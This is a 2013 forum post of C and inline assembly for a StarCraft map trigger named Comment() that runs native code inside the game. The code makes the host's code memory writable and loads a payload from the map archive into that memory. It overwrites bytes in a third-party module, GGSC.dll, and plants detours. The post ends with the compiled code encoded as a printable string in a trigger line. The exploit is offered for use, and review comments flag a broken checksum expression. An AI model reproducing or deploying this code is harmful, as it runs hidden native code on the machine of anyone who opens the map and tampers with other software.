标题:
20号五合一 5.16版本跨系统
作者:
castelu
时间:
2013-8-22 23:51
标题:
20号五合一 5.16版本跨系统
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ole32.lib")
#pragma comment(lib,"dxguid.lib")
#include "dmusici.h"
#include "windows.h"
#define DMUS_SEG_REPEAT_INFINITE 0xFFFFFFFF
#define PINT int *
#define FASTCALL __fastcall
#pragma pack(1)
// Parameter block handed to a trigger action (packed, see the #pragma pack(1)
// above: 6 DWORDs + 1 USHORT = 26 bytes). Only the field order and sizes are
// visible here; the author's "//1" and "//2" marks on Text and Code are not
// explained anywhere in this file. Comment() below never reads the block.
typedef struct
{
DWORD Unused0;
DWORD Text;//1 (author's mark, meaning unknown)
DWORD Code;//2 (author's mark, meaning unknown)
DWORD Unused2;//
DWORD Address;
DWORD Value;
USHORT Operator;
} *ActionParams;                    // the typedef names only the pointer type
typedef void *HANDLE;               // same definition windows.h already provides; redundant but legal in C++
//-----------------------------------------------------------------------
// BOOL __fastcall Comment(ActionParams params)
// Trigger-action handler that runs inside the 32-bit host process (MSVC
// inline asm). `params` is never read: every address, import-table slot,
// offset and byte count below is hard-coded for one particular build of
// the host executable, so the code is tied to that build only. The
// `_EMIT 0xFF 0x15 xx xx xx xx` sequences are hand-encoded `call [imm32]`
// instructions through that build's import table; the names in the
// trailing comments are the author's labels and cannot be verified here.
// Returns FALSE (label `crash`) when the checksum stored in the archive does
// not match the one computed over scenario.chk, TRUE (label `rep2`) otherwise.
// Flow: resolve 3 APIs -> unprotect host code -> checksum scenario.chk ->
// optionally patch a third-party DLL -> back up host memory and plant two
// detours -> return.
// NOTE(review): no return value of the archive / file / allocation calls is
// checked, and the `crash` path returns without releasing the handles or the
// buffer opened above it.
//-----------------------------------------------------------------------
BOOL FASTCALL Comment(ActionParams params)
{//V4 (author's revision tag)
HMODULE t;                          // base of the third-party module, set only when it is found
HANDLE mpq,file,file2;              // archive handle and two in-archive file handles
char *buffer;                       // siz+4 bytes: scenario.chk data, then the 4-byte stored checksum
DWORD siz,siz2;                     // size of file 1; size of file 2 minus its 4-byte checksum header
char *path;                         // = buffer + siz, where the stored checksum is read to
// Resolved at run time in the asm block below. VirtualProtect's pointer
// parameters are declared as DWORD, which is size-equivalent on 32-bit.
BOOL (WINAPI*sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *);
BOOL (WINAPI*sc_ReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesRead );
BOOL (WINAPI*sc_WriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten );
DWORD oldProtect;                   // VirtualProtect's previous protection; later reused as ReadFile's bytes-read scratch
_asm{
// Resolve three APIs by name. Each lookup pushes the address of an inline
// NUL-terminated string with `call $+5+N` (5 = size of the call instruction,
// N = string length including '\0'; the "callee" is never returned to), then
// obtains a module base from the loader list and calls the host's
// GetProcAddress import slot with (module, name) on the stack.
// NOTE(review): fs:[30h] -> PEB, [PEB+0Ch] -> Ldr, [Ldr+1Ch] is presumably
// InInitializationOrderModuleList; `lodsd` steps to the second entry and
// [entry+8] is taken as its DllBase. Which DLL that is differs between
// Windows versions, so this only works where that module exports all three
// names (presumably what the title's "cross-system" refers to) — confirm.
call $+5+15;// 15 = number of _EMIT bytes below = length of "VirtualProtect" including the '\0'
_EMIT 'V';// the API name, one byte per _EMIT
_EMIT 'i'
_EMIT 'r'
_EMIT 't'
_EMIT 'u'
_EMIT 'a'
_EMIT 'l'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 't'
_EMIT 'e'
_EMIT 'c'
_EMIT 't'
_EMIT '\0';// the NUL terminator is mandatory and is counted in the 15 above
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];// host import slot the author labels GetProcAddress; a string literal cannot be used here (it would not compile)
mov sc_VirtualProtect,eax;
// Same lookup for WriteProcessMemory (18 characters + '\0' = 19 bytes).
call $+5+19;// 19 = number of _EMIT bytes below, including the '\0'
_EMIT 'W';// the API name, one byte per _EMIT
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';// NUL terminator, counted in the 19 above
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];// GetProcAddress(module, "WriteProcessMemory") per author's label
mov sc_WriteProcessMemory,eax;
// Same lookup for ReadProcessMemory (17 characters + '\0' = 18 bytes).
call $+5+18;// 18 = number of _EMIT bytes below, including the '\0'
_EMIT 'R';// the API name, one byte per _EMIT
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT 'P'
_EMIT 'r'
_EMIT 'o'
_EMIT 'c'
_EMIT 'e'
_EMIT 's'
_EMIT 's'
_EMIT 'M'
_EMIT 'e'
_EMIT 'm'
_EMIT 'o'
_EMIT 'r'
_EMIT 'y'
_EMIT '\0';// NUL terminator, counted in the 18 above
mov eax,fs:30h;
mov eax,[eax+0Ch];
mov esi,[eax+1Ch];
lodsd;
push [eax+8];
call DS:[0x4ED160];// GetProcAddress(module, "ReadProcessMemory") per author's label
mov sc_ReadProcessMemory,eax;
// Make the host code section writable:
// VirtualProtect(0x401000, 0xEC000, 0x40 = PAGE_EXECUTE_READWRITE, &oldProtect).
// NOTE(review): the old protection is never restored (oldProtect is
// overwritten as ReadFile scratch further down), so the region stays RWX
// for the rest of the process lifetime.
lea eax,oldProtect
push eax
push 40h
push 0EC000h
push 401000h
call sc_VirtualProtect
// Verify scenario.chk: open the archive, read the whole file into a buffer
// and checksum it (C loop after this asm block).
lea eax,mpq
push eax
push 0
push 0
push 0509364h// presumably the path string of the current archive (rep1 below also copies 0x200 bytes from here as a path) — confirm
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xBC
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00// OpenArchive(0x509364, 0, 0, &mpq) per author's label
lea eax,[file]
push eax
push 0
push 4EE0B0h// author's note: points at the string "staredit\\scenario.chk"
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// OpenFileEx(mpq, name, 0, &file) per author's label
push 0
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// GetFileSize(file, 0) -> eax, per author's label
mov siz,eax
add eax,4
push 40h
push 1000h
push eax// siz + 4 bytes (not "500K" as the author's old note said): the extra 4 hold the stored checksum
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// VirtualAlloc(0, siz+4, 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE); NOTE(review): a data buffer does not need execute permission
mov buffer,eax
push 0
lea ecx,siz
push ecx
push siz
push eax
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// ReadFile(file, buffer, siz, &siz, 0) per author's label: siz becomes the byte count actually read
}
DWORD check = 0;
// Weak checksum: every 7th byte of the file, weighted by (offset mod 64).
// NOTE(review): `(i % 64) * buffer` does not compile (int * char*). The forum
// software renders `[i]` as italic and drops it, so the intended expression is
// almost certainly `(i % 64) * buffer[i]` — confirm against the original source.
for(unsigned int i = 0; i < siz; i += 7)
check += (i % 64) * buffer;
path = buffer + siz;                // the 4 spare bytes after the data receive the stored checksum
_asm
{
// Open the second archive file: a 4-byte stored checksum followed by
// siz2 bytes of payload.
lea ecx,file2
push ecx
push 0
push 04FBD08h// presumably the name of the second in-archive file — confirm
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x68
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00// OpenFileEx(mpq, name, 0, &file2) per author's label
push 0
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x58
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // GetFileSize(file2, 0) -> eax, per author's label
// NOTE(review): `sub` rewrites ZF, so `je crash` tests eax == 4 (a file holding
// only the checksum), not the eax == 0 that `cmp eax,0` set up; a size of 0
// falls through with siz2 = 0xFFFFFFFC. The intended order is
// `test eax,eax` / `je crash` / `sub eax,4` / `mov siz2,eax`.
cmp eax,0
sub eax,4
mov siz2,eax
je crash
// ReadFile(file2, path, 4, &oldProtect, 0): the stored checksum, read into the
// 4 spare bytes of `buffer`. oldProtect is only a bytes-read scratch from here on.
lea ecx,oldProtect
push 0
push ecx
push 4
push path
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // ReadFile per author's label
lea ecx,oldProtect
mov eax, 0064650Ch// a pointer-sized slot in host memory; what it points to cannot be told from this file
mov eax, dword ptr [eax]
inc eax
push 0
push ecx
push siz2
push eax
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x54
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // ReadFile(file2, *(0x64650C) + 1, siz2, &oldProtect, 0): the payload is read straight into host memory
mov eax,dword ptr [path]// eax = path
mov eax,dword ptr [eax]// eax = stored checksum
cmp eax,check
je OK
}
crash: return false;                // checksum mismatch (or the size-4 case above). NOTE(review): file, file2, mpq and buffer are leaked here
OK:
_asm{
// Release the archive resources: CloseFile(file), CloseFile(file2),
// CloseArchive(mpq) per author's labels, then VirtualFree(buffer, 0, MEM_RELEASE).
push file
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // CloseFile(file)
push file2
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x60
_EMIT 0xD3
_EMIT 0x4E
_EMIT 0x00 // CloseFile(file2)
push mpq
_EMIT 0xFF
_EMIT 0x15
_EMIT 0xC0
_EMIT 0xD2
_EMIT 0x4E
_EMIT 0x00 // CloseArchive(mpq)
push 8000h// 0x8000 = MEM_RELEASE
push 0
push buffer
call DS:[4ED114h];// VirtualFree(buffer, 0, MEM_RELEASE) per author's label
// Look for the third-party module "GGSC.dll" in this process (author: "Ban GGSC").
call $+14// 14 = 5 + 9 bytes of "GGSC.dll" including the '\0'
_EMIT 'G'
_EMIT 'G'
_EMIT 'S'
_EMIT 'C'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x5C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// import slot 0x4ED15C called with the name only, presumably GetModuleHandleA or LoadLibraryA (0x4ED1B0 is the slot labelled GetModuleHandle below, so this is a different import) — confirm
cmp eax,0
je backup// module not present: skip the patch below and go straight to the backup block
mov t,eax
}
// Overwrite 4 bytes at t + 0xD95A inside that module with 0xEA839090 unless
// they already hold that value. (HANDLE)-1 is the current-process pseudo
// handle, so these are plain self-process reads/writes. Offset and value are
// specific to one build of that DLL.
// NOTE(review): `int OB1 = 0xea839090` initialises a signed int with a value
// above INT_MAX; `unsigned int` would match OBJ. The `je backup` above jumps
// over these declarations; harmless only because nothing after `backup` uses them.
int aa=(int)t+0x0d95a;
int OB1=0xea839090;
unsigned int OBJ;
(*sc_ReadProcessMemory)((HANDLE)-1,(LPCVOID)aa,&OBJ,4,0);
if(OBJ!=OB1)(*sc_WriteProcessMemory)((HANDLE)-1,(LPVOID)aa,&OB1,4,0);
// Backup: copy three regions of host memory into a fresh buffer and plant a
// detour at 0x44811C that restores them (the QuitAsm block further down).
_asm
{
backup:
push 40h
push 1000h
push 20000h// 0x20000 = 128 KiB (the author's old "500K" note was stale); 0x1013C + 0xF9C + 0x9E24 = 0x1AEFC bytes fit
push 0
_EMIT 0xFF
_EMIT 0x15
_EMIT 0x2C
_EMIT 0xD1
_EMIT 0x4E
_EMIT 0x00// VirtualAlloc(0, 0x20000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) per author's label
mov EBX,eax// ebx = backup buffer (the author's "quitasm" note refers to the restore routine that consumes it)
MOV EDI,EBX
MOV ECX,1013Ch
MOV ESI,4F25C0h
REP MOVSB// copy 0x1013C bytes from 0x4F25C0 (assumes DF is clear)
MOV ECX,0F9Ch
MOV ESI,537510h
REP MOVSB// copy 0xF9C bytes from 0x537510
MOV ECX,9E24h
MOV ESI,587660h
MOV ESI,[ESI]
REP MOVSB// copy 0x9E24 bytes from the block pointed to by *(0x587660)
pushad
call $+5
pop eax// eax = address of this `pop`
// NOTE(review): 0x21 is a hand-counted displacement meant to land on the
// `PUSHAD` of the QuitAsm block. My count of the bytes between `pop eax` and
// `PUSHAD` is 0x20 with a short `jmp e1` (0x23 with a near one); if the
// compiler's encodings differ from the author's, the planted jmp lands inside
// an instruction. Confirm against the actual disassembly.
add eax,21h;// eax = address of the QuitAsm block
mov edx,044811ch
sub eax,edx
sub eax,5// rel32 of a 5-byte jmp from 0x44811C to QuitAsm
mov byte ptr ds: [edx],0e9h// 0xE9 = jmp rel32
xchg [edx+1],eax;// store the rel32 (the displaced dword lands in eax and is discarded)
mov EAX,52DF00h
mov esi,EBX
mov dword ptr [eax],esi// *(0x52DF00) = backup buffer, read back by QuitAsm
popad
jmp e1;// the QuitAsm block below is never executed by fall-through
// QuitAsm: entered only through the jmp planted at 0x44811C. Restores the
// three regions from the backup buffer, writes 8 bytes back over
// 0x44811C..0x448123 (they decode to the `test eax,eax` / `mov word ptr
// [645FB8h],cx` pair that is re-executed below, i.e. presumably the original
// bytes the jmp overwrote — confirm against the host binary), then resumes at
// 0x448125 = 0x44811C + 9.
// NOTE(review): `MOV EAX,448125h` clobbers the host's eax after POPAD; the
// flags from TEST survive, eax does not.
PUSHAD
MOV ECX,1013Ch
MOV ESI,DWORD PTR DS:[52DF00h];
MOV EDI,4F25C0h
REP MOVSB// restore 0x1013C bytes at 0x4F25C0
MOV ECX,0F9Ch
MOV EDI,537510h
REP MOVSB// restore 0xF9C bytes at 0x537510
MOV ECX,9E24h
MOV EDI,587660h
MOV EDI,DWORD PTR DS:[EDI]
REP MOVSB// restore 0x9E24 bytes at *(0x587660)
MOV DWORD PTR DS:[44811Ch],8966c085h// bytes 85 C0 66 89 ...
MOV DWORD PTR DS:[448120h],645fb80dh// ... 0D B8 5F 64: the 5-byte jmp is gone again
POPAD
TEST EAX,EAX// the displaced original instructions, executed here instead
MOV WORD PTR DS:[645FB8h],CX
MOV EAX,448125h
JMP EAX// continue in the host right after the displaced instructions
// e1: plant a second detour at 0x464FC5 -> 0x52E055 and copy the save
// routine (`rep1` below, 0x300 bytes) to 0x52E055.
e1: pushad
mov eax,464FC5h
mov byte ptr[eax],0E9h// jmp rel32 ...
inc eax
mov dword ptr[eax],000c908bh// ... to 0x464FC5 + 5 + 0xC908B = 0x52E055
call $+5
pop esi// esi = address of this `pop`
add esi,16h// esi = address of `rep1` (hand-counted, same caveat as the 0x21 above)
mov edi,52e055h
mov ecx,300h// 0x300 bytes must cover everything from `rep1` to the final `jmp ecx`
rep movsb// copy the routine into host memory
popad
jmp rep2
// rep1: the relocated save routine. It runs at 0x52E055 whenever the host
// reaches 0x464FC5. It appends the file named by the path at 0x52E600 to the
// file named by the path at 0x52E400 (padding the latter up to a multiple of
// 0x200 first), restores the 5 original bytes at 0x464FC5 and jumps back.
// C runtime functions are resolved from msvcrt.dll into a table at ebp = 0x52E034:
//   [ebp] fopen, +4 ftell, +8 fread, +0C fwrite, +10 fseek, +14 fclose, +18 malloc, +1C free
// Scratch words: 0x52E018 current FILE*, 0x52E01C size of file 2,
// 0x52E020 pad count, 0x52E024 malloc'd buffer.
// NOTE(review): no fopen/malloc result is checked, so a missing file or a
// failed allocation dereferences NULL inside the host. 0x12F178 looks like a
// stack address (confirm); copying a path from a fixed stack address is fragile.
rep1: pushad
mov ecx,200h
mov esi,012F178h
mov edi,52e400h
rep movsb// 0x200 bytes from 0x12F178 -> 0x52E400 (path of file 1)
mov ecx,200h
mov esi,0509364h
rep movsb// 0x200 bytes from 0x509364 -> 0x52E600 (path of file 2; edi continued from the copy above)
mov ebp,52E034h// ebp = function table
call $+5+11;// push "msvcrt.dll" (10 characters + '\0')
_EMIT 'm'
_EMIT 's'
_EMIT 'v'
_EMIT 'c'
_EMIT 'r'
_EMIT 't'
_EMIT '.'
_EMIT 'd'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
call DS:[004ED1B0h];// GetModuleHandle("msvcrt.dll") per author's label
mov ebx,eax;// ebx = msvcrt base for the lookups below
call $+5+6;// push "fopen"
_EMIT 'f'
_EMIT 'o'
_EMIT 'p'
_EMIT 'e'
_EMIT 'n'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "fopen")
mov [ebp], eax
call $+5+6;// push "ftell"
_EMIT 'f'
_EMIT 't'
_EMIT 'e'
_EMIT 'l'
_EMIT 'l'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "ftell")
mov [ebp+04h], eax
call $+5+6;// push "fread"
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'a'
_EMIT 'd'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "fread")
mov [ebp+08h], eax
call $+5+7;// push "fwrite"
_EMIT 'f'
_EMIT 'w'
_EMIT 'r'
_EMIT 'i'
_EMIT 't'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "fwrite")
mov [ebp+0Ch], eax
call $+5+6;// push "fseek"
_EMIT 'f'
_EMIT 's'
_EMIT 'e'
_EMIT 'e'
_EMIT 'k'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "fseek")
mov [ebp+010h], eax
call $+5+7;// push "fclose"
_EMIT 'f'
_EMIT 'c'
_EMIT 'l'
_EMIT 'o'
_EMIT 's'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "fclose")
mov [ebp+014h], eax
call $+5+7;// push "malloc"
_EMIT 'm'
_EMIT 'a'
_EMIT 'l'
_EMIT 'l'
_EMIT 'o'
_EMIT 'c'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "malloc")
mov [ebp+018h], eax
call $+5+5;// push "free"
_EMIT 'f'
_EMIT 'r'
_EMIT 'e'
_EMIT 'e'
_EMIT '\0'
push ebx
call DS:[0x4ED160]// GetProcAddress(msvcrt, "free")
mov [ebp+01Ch], eax
// Pass 1: measure file 1 and compute how much padding brings it to a 0x200 multiple.
call $+5+3// push "rb"
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // f1 = fopen(path1, "rb")
add esp,8// cdecl: the caller pops the two arguments
mov dword ptr DS:[052e018h],eax // current FILE* = f1
push 2// SEEK_END
push 0
push eax
call [ebp+010h] // fseek(f1, 0, SEEK_END)
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] // eax = ftell(f1) = size of file 1
pop ebx// pops the argument; ebx is plain scratch from here on
mov ecx,0200h// pad up to the next 0x200 boundary
xor edx,edx
_EMIT 0xF7
_EMIT 0xF9// idiv ecx: edx = size % 0x200 (edx was zeroed, fine for sizes below 2^31)
sub ecx,edx// ecx = 0x200 - (size % 0x200); a full 0x200 when already aligned
mov dword ptr DS:[052e020h],ecx// pad count
push dword ptr DS:[052e018h]
call [ebp+014h] // fclose(f1)
pop ebx
// Pass 2: read file 2 into a buffer that has `pad` bytes in front of the data.
call $+5+3// push "rb"
_EMIT 'r'
_EMIT 'b'
_EMIT '\0'
push 052e600h
call [ebp] // f2 = fopen(path2, "rb")
add esp,8
mov dword ptr DS:[052e018h],eax // current FILE* = f2
push 2// SEEK_END
push 0
push eax// FILE*
call [ebp+010h] // fseek(f2, 0, SEEK_END)
add esp,12
push dword ptr DS:[052e018h]
call [ebp+04h] // eax = ftell(f2) = size of file 2
pop ebx
mov dword ptr DS:[052e01Ch],eax// size of file 2 (the author's note called it "f4")
add eax,dword ptr DS:[052e020h]
push eax
call [ebp+018h] // buffer = malloc(pad + size2)
pop ebx
mov edi,eax// edi = buffer. NOTE(review): malloc does not zero the `pad` bytes, so the padding written below is uninitialised heap, not zeros
mov dword ptr DS:[052e024h],edi
push 0
push 0
push dword ptr DS:[052e018h]
call [ebp+010h] // fseek(f2, 0, SEEK_SET)
add esp,12
mov ecx,dword ptr DS:[052e020h]// pad count
add edi,ecx// file-2 data goes after the pad bytes
push dword ptr DS:[052e018h]// FILE*
push 1
push dword ptr DS:[052e01Ch]// size2
push edi// buffer + pad
call [ebp+08h] // fread(buffer + pad, size2, 1, f2)
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] // fclose(f2)
pop ebx
// Pass 3: append pad + file-2 data to file 1.
call $+5+3// push "ab"
_EMIT 'a'
_EMIT 'b'
_EMIT '\0'
push 52e400h
call [ebp] // f1 = fopen(path1, "ab")
add esp,8
mov dword ptr DS:[052e018h],eax
mov ebx,dword ptr DS:[052e01Ch]// size2
add ebx,dword ptr DS:[052e020h] // ebx = size2 + pad (the author's "+f1size" note is a misnomer)
push eax// FILE*
push 1
push ebx
push dword ptr DS:[052e024h]
call [ebp+0Ch] // fwrite(buffer, size2 + pad, 1, f1)
add esp,16
push dword ptr DS:[052e018h]
call [ebp+014h] // fclose(f1)
pop ebx
push dword ptr DS:[052e024h]
call [ebp+01Ch] // free(buffer)
pop ebx
// Put the 5 original bytes back at 0x464FC5 (85 C0 74 1A B9 — presumably the
// instructions the jmp overwrote; confirm against the host binary) and resume there.
// NOTE(review): `mov ecx,...; jmp ecx` after `popad` clobbers the host's ecx;
// that is only harmless if the code at 0x464FC5 rewrites ecx before reading it.
mov eax,0464FC5h
mov byte ptr[eax],085h
inc eax
mov dword ptr[eax],0B91A74C0h
popad
mov ecx,00464FC5h
jmp ecx
}
rep2: return true;                  // checksum matched; detours are in place
}
// Empty marker placed directly after Comment(): Base64Enc() uses the distance
// between the two function addresses as the byte length of Comment()'s code.
// NOTE(review): this relies on the compiler and linker keeping the two
// functions adjacent and in source order; optimisation or incremental linking
// may break that — verify the emitted size before shipping the output.
void AfterFunction(){}
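// Encodes the machine code of Comment() as printable text: every 3 input bytes
// become 4 characters in the range '0' (0x30) .. 'o' (0x6F), i.e. a 6-bit-per-
// character encoding with a 0x30 offset (not real base64, despite the name).
// size    : number of bytes to encode; <= 0 means "from Comment() up to
//           AfterFunction()" (see the marker function above).
// returns : a NUL-terminated string allocated with new BYTE[]; the caller owns
//           it and must release it with delete[] on the BYTE* cast.
// Fixes vs the original: the output buffer was 2 bytes too small whenever size
// was a multiple of 3 ((size-1)*4/3+1 bytes allocated vs 4*ceil(size/3)+1
// written), and a size that was not a multiple of 3 read up to two bytes past
// the input. The final partial triple is now zero-padded instead.
LPCSTR Base64Enc(int size = 0)
{
    if (size <= 0)
        size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
    if (size <= 0)
    {
        // Nothing to encode (e.g. unexpected link order): return an empty string.
        PBYTE empty = new BYTE[1];
        empty[0] = 0;
        return (LPCSTR)empty;
    }
    const PBYTE text = (PBYTE)Comment;
    const int groups = (size + 2) / 3;            // ceil(size / 3) output quartets
    PBYTE out = new BYTE[groups * 4 + 1], buf = out;
    for (int pos = 0; pos < size; pos += 3)
    {
        // Zero-pad the last triple instead of reading past the end of the input.
        BYTE b0 = text[pos];
        BYTE b1 = (pos + 1 < size) ? text[pos + 1] : 0;
        BYTE b2 = (pos + 2 < size) ? text[pos + 2] : 0;
        *buf++ = ((b0 >> 2) & 0x3F) + 0x30;
        *buf++ = (((b0 & 3) << 4) | (b1 >> 4)) + 0x30;
        *buf++ = (((b1 & 0xF) << 2) | (b2 >> 6)) + 0x30;
        *buf++ = (b2 & 0x3F) + 0x30;
    }
    *buf = 0;                                     // NUL terminator (the +1 in the allocation)
    return (LPCSTR)out;
}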
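// Writes the encoded body of Comment() as two trigger-action lines to a text
// file. argv[1] may name the output file; otherwise the author's hard-coded
// path is used. Returns 0 on success, 1 if the file cannot be opened.
int main(int argc, CHAR* argv[])
{
    const char *outPath = (argc > 1) ? argv[1] : "d:\\desktop\\comment20.txt";
    FILE *f1 = fopen(outPath, "wb");
    if (f1 == NULL)
    {
        // The original dereferenced a NULL FILE* when the directory was missing.
        fprintf(stderr, "cannot open %s for writing\n", outPath);
        return 1;
    }
    LPCSTR encoded = Base64Enc();
    fprintf(f1, "Comment(\"%s\", 0, 0, 20, 0, 1);\nComment(\"\", 0, 0, 0, 0, 20);", encoded);
    fclose(f1);
    delete[] (PBYTE)encoded;                      // Base64Enc() allocates with new BYTE[]
    return 0;
}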
Comment("EH_\Pna8DeIGRDfhj0l0001FJG9dMF5\D79_M6ESM01TXC00002;@0b;L1b]og08?_lEH=5>08U5l>PC0000Eg9YM6E@LVmSIG=cCFE]Kg9i06BQ<00008]038]`7:goL0PnoaEPdDh0RDG\j180001BIF5TD79_HfEcLdeUKFmbN@1TXC00002;@0b;L1b]og08?_lEH=5>08U5i8e5m51Z@6P0`0h0J00@@03oEO2=AMA@JP1Z06QTTe00oaFldTh0SDGXD6X0J;3PCP3oMMCo5FSCCP1Z0?mej?lEF==>08U5`8?016Y0J00@001@JP3o5BcACP29ALQZ08e=`57oML1@ogGXoaEDddh0PfGh08=U_03[2H]5_8?01hU5_8]5_3]5`7<NRdFl<m9Z@5WglH]5b0=5_0nn00n_d0=En8UEn>_ARdG80dG0RDG<SDgHDFX0J0RmC`3oMMCo5FSCCP1Z0?mef?lEF==>08?h08?X18U5g7@iSDgdJP1AJPCoMLcoMMSo5ECCCP2=COBh36ET08\0@6X0DOmeg53oMMSo5ECCCP2;ALb;03]5n7@7<l3YT@<00?mej?lEH==>0?mef?lEH==>0?mee?lE`=9>06P0P000JP3oMLPnoaDDdDh0j0T00017Ae=3;VA\K03o5EcACP23n01d?HU5a8]5a0EJf@00RDGladG@T923jVX0JPB=AN1@ogGlJ_ooENB;AN0kAM1d46X0JPB=AM1@ogGlJ_ooENaZ@6P04000J0000P1Z0?lE;=5>08_HRo^i?0410;k09Dl0ljBiW0l00;h@ME<0ljBi99h00;iPMUP0RcKcY63X000005R3`26j785402_2PnP5?\H2jHM20KP0ge80Ro>9<67[Ef2i?04103j;=@3ODP2o`2E?0?>T^I`?002o47EC0?>T^BBN002oH7IH03j;?o>T?\L5785408G0IXTna`DPPD@03KQOI665`6HnR@fhGf@0^2F1A03oh62haDm60<H0jD3708^@303X000005j3aQJoEN1B0;T00`00ljAQjBD2001P^@02002nN?4B0;l0i580ljBi00800;iTTe00ljBm=>1B0>P;0000KG=fHg9d;VA\K00noaF`dDh0RmSX1P0006I_L6E^05<noaEPdDh0RDD0j0H0001VM6E\K01C?_lEH=5>08U51>P60000IW9UHF@0Dcko5F3ACP29A@SX1`0006IgLVUdI@1C?_lEH=5>08U53>P60000IW=UIF\0Dcko5F3ACP29AA3X1`0006ISK6mcI@1C?_lEH=5>08U55>P70000KF5\K6mS05<noaEPdDh0RDDHj0D0001VLVEU05<noaEPdDh0RDDLj0<0001bHP1X0>AB0?mE08?423jS6>1B06X2JP1@oeD@Pl@<?_le6>1B0?mE15^i008003?BmoT[bSj93B3PDP0nocDHh580oeDDFnP30000LV80J03VDP3oE@23a0PnXaSPDP1Z0VX0D?mE48?433ko=ASPDP3oE@AK?Z<Lh580?P<58>1B053oEAQKRoPnRCdTh580JP1Z03ko=ASPDP3oEA23a0`nR`dPh5800oTnocDHh580JP4nocDLh580EomE28?443ko=ASPDP3oEAAKj0<0001QHP1X0>AB0?mE08?423jS6>1B03j;7AcPDP0n0adPh580D6X1Dcko=BCPDP3oE@b3a10nocDHh580oeDDFcko=BCPDP3oEAaK^<E?AP3608E0a`30M1ZiHKW5CdH0on4c`41OGU_9`l=A", 0, 0, 20, 0, 1);
Comment("", 0, 0, 0, 0, 20);